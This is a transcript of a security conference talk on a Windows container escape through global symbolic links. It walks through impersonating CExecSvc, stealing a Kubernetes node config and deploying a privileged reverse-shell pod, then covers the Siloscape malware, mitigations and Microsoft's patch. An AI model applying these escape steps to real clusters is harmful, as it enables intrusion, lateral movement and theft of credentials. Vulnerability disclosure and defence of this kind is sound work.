So, hello everyone, welcome and thank you for joining. You are about to hear a story about how a single missing condition in an if statement enabled one of the easiest container escapes of recent years. So let's just get started. Okay, so who am I? My name is Daniel Prizmant and I'm a Senior Security Researcher at Palo Alto Networks. I did reverse engineering on the Windows platform for years. I joined a containers-focused team that mostly did open source vulnerability research on cloud products. Our team is full of security researchers focused on finding vulnerabilities in the cloud, and I was the only Windows guy on the team, so I decided to focus on Windows containers. Okay, so I'll go over the agenda real quick. We will start things off with a demo to show you the impact of this issue. I will then cover containers in general and Windows containers in particular. I will also go over some of the fundamentals that one needs to know in order to fully understand the issue I'll be covering. I will cover the issue itself and what made it possible. After that, we will cover how cloud providers are affected by this issue. And lastly, we'll briefly talk about malware that took advantage of this issue to gain some free processing power. When we're finished, I will try answering some of the questions you might have. Okay, let's get started with the demo. I will try to explain it while it runs. First of all, I'm deploying a Kubernetes YAML. I took this YAML from the official Kubernetes website and didn't change anything. The only thing I'm doing here is applying a deployment while stating that the node I'm choosing is Windows and not Linux. So it created two deployments for me, and then I'm checking that they're actually running. At this point I'm executing into the container; I will explain more in the next slide. For now, I'm mimicking an attacker actually gaining execution inside the container.
So as you can see, I'm inside the Windows container. I moved to C: and I'm making a directory for all my files for the breakout. I prepared them beforehand; I will explain more in the rest of the talk. I'm downloading all the tools I created to make the breakout. Basically it's a DLL which carries the logic itself and an injector which injects the DLL into one of the container's processes. As you can see, I used the injector, and it injected the DLL into the main container process. I also made a log file, which logs what happened from inside that process. I created a symbolic link to the host. How that is possible, I will explain later. For now I'm only doing a simple file copy from the host using the symbolic link I created, copying a file from the host into the container so I will have access to it from inside our container. The file I'm copying is the config file of the node, the config file that the node uses in order to talk with the Kubernetes API server. As you can see, it contains all the certificates and keys that the node has, and I'm going to use this config to impersonate the node in front of the Kubernetes API server. As you can see, I'm pointing at the kubeconfig I want to use instead of the default config, and I can actually query the API server and get information. For example, I see all the running pods, just as I did from outside the container. And I have a YAML here for a Linux container which opens a reverse shell. This container is also privileged. My goal here is to create a new privileged container, a Linux one, so Kubernetes will create this container on a Linux machine and not Windows, because I already have access to the Windows machine; I want access to a Linux machine too. So I'm creating a deployment using the config file I stole from the node, and I created a new privileged container. That container contains a reverse shell, so I'm going to connect to that shell from my Windows machine using Netcat.
As you can see, I'm inside the privileged Linux container, and I have full access to the Linux node too, because the container is privileged. At this point the cluster had only two nodes: a Linux node and a Windows node. I used the Windows node to break out and create a privileged container, so I had access to both Windows, using the vulnerability, and Linux, using the config file. Okay, but let's explain the demo a bit more. What does it all mean? I won't go over the demo step by step because I didn't explain the issue yet, but nevertheless, let's go over the main idea here. I created a new deployment, and note that I specifically stated in the YAML that I want a Windows node. I used the example YAML from the Kubernetes website with the default configuration of the cluster. If you Google how to create a Windows container in Kubernetes, that's what you'll find, and I didn't change anything. Remember that, because it is important for later. So I created the deployment and issued an exec command into it. This part might confuse you: I used the exec command to mimic an attacker gaining execution in the cluster. For example, if your cluster hosts a web server with a vulnerability and an attacker manages to use this vulnerability to gain access to your cluster, we will end up at the same step here, because the attacker will gain execution and I just use exec. I skip the part where I would have to find a vulnerability in your container and get execution in the container. After that, I use some symbolic link tricks to gain access to the host file system, and in this case, the host is the Kubernetes node. Once I gained access to the node's file system, I used the node's Kubernetes config file to impersonate the node to the API server in order to create a privileged Linux container. Because I created a Linux container, the API server creates this container on a Linux node.
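The privileged pod from the demo can be sketched roughly like this. This is a hedged reconstruction, not the exact YAML used in the demo: the pod name, image, and the attacker address are hypothetical placeholders.

```yaml
# Hedged sketch of the demo's privileged reverse-shell pod (names,
# image, and address are hypothetical, not taken from the talk).
apiVersion: v1
kind: Pod
metadata:
  name: revshell
spec:
  nodeSelector:
    kubernetes.io/os: linux        # schedule on the Linux node
  containers:
  - name: shell
    image: busybox
    # placeholder: connect back to the attacker's listener
    command: ["sh", "-c", "nc ATTACKER_IP 4444 -e sh"]
    securityContext:
      privileged: true             # full access to the Linux node
```

Because the pod is privileged, code running in it effectively controls the node that schedules it, which is what the demo shows next.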
My container packed a reverse shell, and once it was up, I simply connected to the shell, gaining access to the Linux node as well. At this point, I had full access to both the Linux and the Windows parts of the cluster, and I could do anything I wanted with the cluster. I could create new deployments to mine cryptocurrency, or I could steal all the data in the cluster, or anything else. The possibilities from here are endless. Okay, so what are containers? I know this is a cloud event and most people here probably know what a container is, but I will go over it quickly just in case. A container is basically an operating-system-based virtual machine, meaning it runs inside an operating system with the same kernel as that operating system. It uses operating system features to isolate the virtual machine from the rest of the system. That's unlike actual virtual machines, which use a completely separate operating system and base their virtualization on hardware instead of software. Containers can run anything, but the desired container must match the operating system version. For example, you won't be able to run Windows containers on a Linux machine; as you saw in the demo, I had to create a Windows node in order to run Windows containers. One of the most important features of containers is that they pack all the necessary files to run the application. So for instance, if you have a special application with special dependencies, you can pack it all in a lightweight container and ship it to the end user. Okay, so let's go over the differences between a container and a virtual machine real quick. The main difference is that containers rely on the operating system for their isolation, while virtual machines rely on hardware. Virtual machines virtualize everything including the kernel, while containers run on the same kernel as the host.
Because of that, containers are much more portable and efficient. A container image can be as small as a few kilobytes, while a virtual machine image will usually be at least a few gigabytes in size, because it has to pack the kernel too. All of that comes with a price, of course: containers are much less secure than virtual machines. If you search Google for container escapes, you will probably find many more results than for virtual machine escapes. Okay, so on the left side, you can see a virtual machine infrastructure with a hypervisor managing all the machines; each machine has a separate operating system. On the right is the infrastructure of a Docker machine hosting a few different applications. With containers, each application is inside a separate container, but they are all running on the same host operating system with the same kernel. Okay, so what needs to be contained? Let's dive a bit deeper into the internals, and note we are only talking about Linux for now; we'll get to Windows later. Well, obviously you would want to limit the container's access to resources such as CPU, RAM, network bandwidth, disk bandwidth and such. This is done using a feature called cgroups, which allows us to limit resource usage for a group of processes. Obviously, you wouldn't want your container to take all the CPU or all the disk from your host, so you can limit it. But you would also want to limit the visibility the containers have. If we only limited resources, nothing would stop a malicious container from just changing its own resource limitation. For that, we also want to limit the container's visibility into some of the host's objects, such as processes, network interfaces, users, mounts, things like that. This is done using a feature called namespaces. All of that is Linux. But this is a talk about Windows containers, so let's move on to Windows.
In order to get a good container solution on Windows, the same requirements I talked about in the last slide need to be implemented here. Luckily, Windows has had a solution for resource limitation for years. It's called job objects, and they do pretty much the same thing as cgroups in Linux. There is nothing too interesting about them, but it is important to know that the feature has existed for years; it's not new. It's like the Windows version of cgroups. Okay, but what about visibility isolation? Until recently, Windows didn't actually have a solution for this, and that's why Windows containers didn't exist until a few years ago. But then Microsoft came up with a feature called server silos, which directly provides the missing pieces that were necessary in order to create a container solution. Server silos provide everything that namespaces provide in Linux. They isolate the object manager, the registry, networking devices, and basically any named object that a process can access. Remember the named object part; that's the important thing. Note also that there are two types of Windows containers: Hyper-V containers and server silo containers. On the right, you can see what a Hyper-V container architecture looks like. It's not much different from a regular virtual machine, actually: each container has its own lightweight kernel. Basically, it's Microsoft's version of a VM, and it's not what we are here to talk about today, because it's a VM. On the left side, you can see the more traditional meaning of containers: one kernel with a few containers for different applications. Note that the system processes are also shared with the containers. This is done using server silos; as you can see, all the containers are using the same kernel and the same system processes. Okay, there is one more thing you need to know before understanding how it all works.
It's called the root directory object, which is a key feature of the Windows operating system that has nothing to do with containers specifically. Without getting too deep into this mechanism, suffice it to say that all application-visible named objects, such as files, registry keys, events, mutexes, RPC ports, stuff like that, anything that is named, are hosted in a root namespace, which allows applications to create, locate, and share these objects among themselves. Take a look at this screenshot from the WinObj application by Sysinternals. It shows the root directory object perfectly. As you can see on the left, there are many directories under the root object, and under GLOBAL?? there are tons of symbolic links, including the C: drive-letter symbolic link. So yes, when you access the C drive on your Windows machine, it is in fact a symbolic link to the actual device. There are many more symbolic links over there, but the one most relevant to us is the C: link, which points to the actual file system device, which in this case is HarddiskVolume3. In this screenshot, you can see the root directory object of a host. It's not the root directory object of a container or a server silo; it's the root directory object of the host. Note it could also be a virtual machine, but a virtual machine has its own kernel, so this screenshot is from a machine with its own kernel and not a container. In this next screenshot, however, you can see what a container looks like in the root directory object. Notice on the left there is a Silos directory. Every server silo container will have its own sub-directory under this directory, with the name being the server silo ID. In this particular case, I had a single container with a silo ID of 804. As you can see, the silo's directory is almost identical to the host's directory. This is because Windows tries to virtualize a mini operating system as accurately as possible.
So most of the symbolic links that the host has, the container has too, with different destinations of course, because we don't want the container to point to the same devices as the host. We will discuss the server silo root directory object further later in the talk. Let's move over to an actual example of how the root directory object is used in a simple CreateFile call. The CreateFile API receives the file's path and returns a handle to the file. The process can read, write, or do basically any action with the handle, depending on the permissions the process asks for when calling the CreateFile function. In this example, we are calling CreateFile on a file in the C drive named secret.txt. As I said earlier, note that the C: part is just a symbolic link; as you can see in the screenshot below, it points to \Device\HarddiskVolume3. So C: is first converted to something the kernel can actually query: the root directory object form of this path. This is done in user mode, before the call arrives at the kernel. After that, the kernel queries the \GLOBAL??\C: path in the root directory object and receives the destination of that symbolic link. The kernel then queries that destination, still under the root directory object, and this time the parsing ends with an actual device. At this point, having an actual device, the kernel forwards the request to the device driver, which in this case is the file system driver. From here, the file system driver takes over the execution, and that part is less important for us, because we're not here to talk about the file system driver. Remember the part where the kernel received the symbolic link's target and queried it under the root directory object until it found an actual device; it will be important for us later. Also remember that this query was an example of a query from the host and not from inside the container.
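The host-side resolution just described can be sketched as a tiny model. This is an illustrative toy, not real kernel code; the object names come from the WinObj screenshots in the talk, while the dictionary layout and the resolve loop are assumptions made for clarity.

```python
# Toy model of Object Manager path resolution on the HOST (illustrative
# assumptions, not real kernel code). Names follow the talk's screenshots.
NAMESPACE = {
    # the C: drive letter is just a symbolic link...
    r"\GLOBAL??\C:": ("symlink", r"\Device\HarddiskVolume3"),
    # ...which ends at an actual device handled by the file system driver
    r"\Device\HarddiskVolume3": ("device", None),
}

def resolve(path, max_reparses=64):
    """Follow symbolic links under the root directory object until an
    actual device is reached, then hand the request to its driver."""
    for _ in range(max_reparses):
        kind, target = NAMESPACE[path]
        if kind == "device":
            return path          # parsing ends: forward to this device
        path = target            # reparse: continue from the link target
    raise RuntimeError("too many levels of symbolic links")

# CreateFile("C:\\secret.txt"): user mode rewrites C: to \GLOBAL??\C:,
# then the kernel resolves it down to the device.
print(resolve(r"\GLOBAL??\C:"))  # → \Device\HarddiskVolume3
```

The `max_reparses` cap stands in for the kernel's own limit on reparse depth, which will matter when we hit the apparent infinite loop later.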
It is slightly different when the call comes from inside the container; we'll cover that in a minute. Okay, so before giving you an example of a file access from inside the container, let's discuss how the system decides that a call comes from inside a container in the first place. On the left is a screenshot from IDA, where I searched for the keywords silo and server silo. There are plenty of functions that can decide whether a call comes from a server silo or not, and the kernel uses different functions in different scenarios. This screenshot is from the ntoskrnl binary, the binary that implements the Windows kernel. In our specific case, if the kernel decides the call comes from a container, it will query the path we saw before, the \GLOBAL??\C: path, relative to the server silo's sub-directory inside the root directory object. This will happen for every access to a named object, such as files. So every access to a named object from inside a server silo, meaning from inside a container, will be queried relative to the Silos directory and then the silo's ID, in this case 804. In this screenshot from IDA, you can see the branch in the kernel where it is decided whether a path will be queried against the actual root directory object or against the server silo's sub-directory in the root directory object. As you can see, this is done using PsGetPermanentSiloContext, a kernel function which just returns the silo's context. Okay, let's go over an example of accessing a file from a container. As before, we are accessing a file named secret.txt under the C drive, exactly as before, but this time from inside a container. I'm skipping the user mode part, where the API adds the \GLOBAL??\ prefix, and jumping straight to the kernel part, because we already covered that. So the kernel calls PsGetPermanentSiloContext, as you saw.
This time there is a silo context, and it is not NULL. If it were NULL, as you saw in the last picture, the path would be queried against the real root directory object of the host and not the silo's. So the kernel takes the server silo branch in its code, and it queries the relevant directory under the silo's sub-directory in the root directory object until it finds the C: symbolic link. Okay, but this time the C: symbolic link points to a virtual hard disk device under the silo's sub-directory in the root directory object. Note the VHD in the device's name; before, it was just HarddiskVolume, and in this case it's a VHD, which represents a virtual hard disk. Okay, but take a look at the screenshot; this is the interesting part. That virtual hard disk device isn't a device at all. It is a symbolic link which points to itself, a symbolic link with the same name, so it looks like we should end up in an infinite loop, because we have a symbolic link that points to itself. This was the point in my research when I realized there was something I was missing, because the request for the file was successful, and I was able to read and write the file in my container. So it was obviously working, but on the other hand, it looked like we should have been stuck in an infinite loop. So what's going on here? Let's go over what the requirement is in this case, and of course it's relevant to what I just said about the infinite symbolic link. Every container, whether in Linux or in Windows, needs to be able to communicate with some of the host's devices. It can be a screen to show output, or a network device, or the file system. So given the way Windows works, some of the symbolic links under the server silo's sub-directory must point to a device in the host's root directory object; otherwise the container won't have access to anything. For example, the container's virtual file system is eventually just a path in the host file system.
And the container must have access to that path at least, so it must have access to the host file system device. And we're getting closer to the actual issue, I promise. The way it is done in Windows is that processes with the right permissions can set a symbolic link as global. A global symbolic link will always be parsed relative to the host's root directory object, regardless of whether the process trying to parse it is inside a container. So when the container is created, Docker sets some of the container's symbolic links as global, and that's why the container can maintain some sort of communication with the host: it parses global symbolic links, and the result is devices on the host. Note that non-global symbolic links, regular symbolic links, are parsed straight against the silo's sub-directory, as we discussed earlier. Okay, in this screenshot, again from IDA, you can clearly see the condition. It checks one of the symbolic link's fields, the one that holds whether the link is global or not. If it is global, the execution takes the right branch and retrieves the root directory object from a global variable in the kernel. If not, it takes the left branch, and then it has to get the silo context first; as you can see, the left branch calls PsGetPermanentSiloContext. So if the symbolic link is global, the link will be parsed from here instead of from here. That's just a visualization of that. Okay, let's move on to the how: how can we exploit that global symbolic link feature to break out of the container? The function that is in charge of making symbolic links global is the undocumented NtSetInformationSymbolicLink function. After reversing it in order to understand what parameters the function expects, I discovered that it requires the SeTcbPrivilege permission in order to make a link global. And sadly, the regular container user doesn't have that permission.
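Putting the pieces together, the parse rules just described (silo-relative by default, host-relative for global links) also explain the apparent infinite loop from before. Here is a toy model of that logic; it is an illustrative assumption, not kernel code, and the VHD device name is made up for the example.

```python
# Illustrative model (not kernel code) of the branch shown in IDA: a
# GLOBAL symbolic link is parsed against the host root directory object,
# a regular link relative to \Silos\<silo id>. The VHD name is made up.
SILO = r"\Silos\804"
NS = {
    # the real virtual hard disk device lives on the HOST
    r"\Device\VhdHardDisk42": ("device", False, None),
    # inside the silo, C: points to the VHD device *name*...
    SILO + r"\GLOBAL??\C:": ("symlink", False, r"\Device\VhdHardDisk42"),
    # ...and inside the silo that name is itself a symbolic link to the
    # very same name, but marked GLOBAL: the next lookup goes to the
    # HOST root, where the real device lives. No infinite loop.
    SILO + r"\Device\VhdHardDisk42": ("symlink", True, r"\Device\VhdHardDisk42"),
}

def resolve(path, in_silo, max_reparses=64):
    """Parse an object path the way the talk describes the kernel doing it."""
    for _ in range(max_reparses):
        full = SILO + path if in_silo else path
        kind, is_global, target = NS[full]
        if kind == "device":
            return full
        if is_global:
            in_silo = False   # GLOBAL link: reparse against the host root
        path = target
    raise RuntimeError("stuck in an infinite symbolic link loop")

print(resolve(r"\GLOBAL??\C:", in_silo=True))  # → \Device\VhdHardDisk42
```

If the self-referencing link were not marked global, the same lookup would keep landing on the silo copy of the name forever, which is exactly the loop the talk describes.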
So if you are, for example, hosting a web server and someone managed to abuse a vulnerability in it and gain execution inside your container, that web server process, in the context the attacker is running in, won't have the SeTcbPrivilege needed to create a global symbolic link. Okay, but lucky for us, there is another process in the container's scope, meaning it is visible to the container's user even without SeTcbPrivilege, called CExecSvc.exe. It is the main process of the container, the process that spawns all the other processes, and this process does, in fact, have SeTcbPrivilege. And lucky for us again, by default, the normal container user is an administrator. So coming back to the web server example: if you're running a web server, the web server is running as administrator by default. So let's look at this screenshot from IDA. As you can see, there is a check for SeTcbPrivilege before moving forward with the execution and making a symbolic link global. That screenshot is from the NtSetInformationSymbolicLink function that I mentioned earlier. So let's go over the step-by-step plan. First, impersonate CExecSvc to gain SeTcbPrivilege. There are numerous ways to do that, such as thread impersonation or DLL injection, and there are probably other ways that I didn't mention or research. In the demo, I used DLL injection; later, when I researched it further, I moved to thread impersonation. After that, we create a regular symbolic link, which at this point is not global and points to our local containerized C drive. Then we call NtSetInformationSymbolicLink with our newly created symbolic link to make it global, and remember that we do that after we have already impersonated CExecSvc.
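The step plan above can be sketched as a toy model. This is an illustration of the logic only, not the real Windows API: the function is a stand-in for the undocumented NtSetInformationSymbolicLink, and the dictionary "links" are assumptions; only the NTSTATUS values are real.

```python
# Toy model of the escape steps (illustrative assumptions, not the real
# Windows API). Real NTSTATUS values from the talk's patch discussion:
STATUS_SUCCESS = 0x00000000
STATUS_PRIVILEGE_NOT_HELD = 0xC0000061

def nt_set_information_symbolic_link(link, caller_has_se_tcb):
    """Stand-in for NtSetInformationSymbolicLink: marking a link
    global requires SeTcbPrivilege."""
    if not caller_has_se_tcb:
        return STATUS_PRIVILEGE_NOT_HELD
    link["global"] = True
    return STATUS_SUCCESS

def resolve_target(link):
    # Simplified: a non-global link is parsed relative to the silo's
    # sub-directory (container disk); a global link is parsed against
    # the host root directory object (host disk).
    return "host C: drive" if link["global"] else "container C: drive"

# Step 2: create a regular, non-global symbolic link X: -> C:.
x_link = {"name": "X:", "target": "C:", "global": False}

# As a plain container user (no SeTcbPrivilege) the call is denied.
assert nt_set_information_symbolic_link(x_link, caller_has_se_tcb=False) \
    == STATUS_PRIVILEGE_NOT_HELD

# Steps 1+3: after impersonating CExecSvc.exe we hold SeTcbPrivilege,
# so the call succeeds and X: now resolves against the host.
assert nt_set_information_symbolic_link(x_link, caller_has_se_tcb=True) \
    == STATUS_SUCCESS
print(resolve_target(x_link))  # → host C: drive
```

The key point the model captures is that nothing about the link itself changes except one flag; flipping it moves the entire resolution from the silo's namespace to the host's.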
So at this point we have full access to the host's C drive by using our local X drive, because we created a symbolic link from X: to C: and made it global, so now it points to the host. And we are done here; the possibilities are endless. At this point we have full access to the host file system. As you saw in the demo, I was able to copy the config file of the node, which is not inside a container; it's on the host, inside the node. I'm only talking here about the file system, but this can be used for the registry and basically any named object; the file system was just the easiest to exploit and demonstrate. Okay, but how are cloud providers affected by this? Well, the trivial case is any Kubernetes cluster with a Windows node: an attacker that gains access to a container can just break out to the host and possibly spread from there, exactly as I did in the demo. It depends on how the cluster is configured, but the attacker will at least be able to control every container on the specific node that was compromised. Even if the Kubernetes cluster is configured well and, unlike in my demo, one node can't access other nodes, the attacker will at least have access to that node with all the containers this node hosts. And as I demonstrated in my demo, an attacker could possibly spread to the rest of the cluster as well, so not just their node, but other nodes too. Another possibility involves the whole containers-as-a-service trend that's going on lately. Imagine a cloud provider offering Windows containers as a service and not as part of an entire cluster. An attacker could host a malicious container, break out of their own container, and gain access to other customers' private containers, because they are running on the same host; the cloud provider won't create a new host with a new kernel for each customer. So that's a possibility. I didn't check it yet, I didn't exploit it, but this could happen.
Okay, let's move on to an actual example of how this vulnerability was used in the wild by attackers. A few months ago, I discovered Siloscape, a malware that was using this vulnerability to gain access to Kubernetes clusters. It targeted Windows containers specifically: early in its execution, if it detected that it wasn't running inside a Windows container, it just exited. It used exactly this global symbolic link issue to spread through the rest of the Kubernetes cluster. It basically opened a backdoor to its command-and-control server and just waited for commands. As part of my research, I actually discovered it had active victims, each one being a Kubernetes cluster with potentially a huge amount of processing power. I didn't have any way to actually check. Hi, Daniel. Just jumping in here, you have five minutes left, and I actually have a question for you if you'd like to answer it. I'm about to finish, just a moment. Okay, no problem. Okay, so as I was saying, the amount of processing power that those Kubernetes clusters had is unknown; they could be huge clusters with a huge number of processors. Okay, but what can you do about it? Well, there are a few things. First of all, in order for an attacker to even be in a position to use this issue, they first need to gain access to your container, and most of the time this happens through an outdated application in your containers or a misconfigured container manager. So keep your applications up to date, even if they're inside a container. This is relevant to both Linux and Windows, actually. Next, and this is only relevant to Windows, I advise you to run your container as ContainerUser instead of administrator; it would be much harder to pull something like this off without administrator permissions. Kubernetes supports that as well: there is a special field you can set in your YAML to run your applications as ContainerUser, even in Kubernetes. And third, update your Windows hosts.
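The ContainerUser recommendation can be expressed in the pod spec. A hedged sketch follows: the `windowsOptions.runAsUserName` field is from the Kubernetes pod security context, while the pod name and image are hypothetical.

```yaml
# Hedged sketch: run the Windows workload as the low-privileged
# ContainerUser account instead of the default administrator.
# Pod and image names are hypothetical placeholders.
apiVersion: v1
kind: Pod
metadata:
  name: win-webserver
spec:
  nodeSelector:
    kubernetes.io/os: windows
  securityContext:
    windowsOptions:
      runAsUserName: "ContainerUser"   # not an administrator
  containers:
  - name: web
    image: mcr.microsoft.com/windows/servercore/iis
```

With this set, a compromised application inside the container starts without administrator rights, which makes the impersonation step of the escape much harder.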
Updating your hosts is mostly relevant if you are running your cloud environment on your own; if you are using one of the cloud providers, they usually keep the host updated. And last but not least, configure Kubernetes properly. For example, there is no reason the node's user should be a cluster administrator like in my demo; nodes shouldn't be able to create deployments on other nodes. And real quick, because we are running out of time: a few weeks ago, Microsoft actually patched this NtSetInformationSymbolicLink function, and the patch is extremely easy to understand, very straightforward. As you can see, any call to NtSetInformationSymbolicLink from a thread inside a container will be blocked with a STATUS_PRIVILEGE_NOT_HELD error. This is done using the PsIsCurrentThreadInServerSilo function, which, as its name suggests, checks whether the current thread belongs to a process inside a server silo. On the right, you can see how the function looks after the patch: there is simply a call, and a branch there which checks if the call comes from a server silo. So what's next? I will probably start with checking Microsoft's patch; maybe the function it uses, PsIsCurrentThreadInServerSilo, is broken and I can still break out. I will probably also look for other ways to abuse symbolic links to break out of the container, and I'll also search for other paths to the host that are not specifically related to symbolic links. Okay, let's go on to the questions.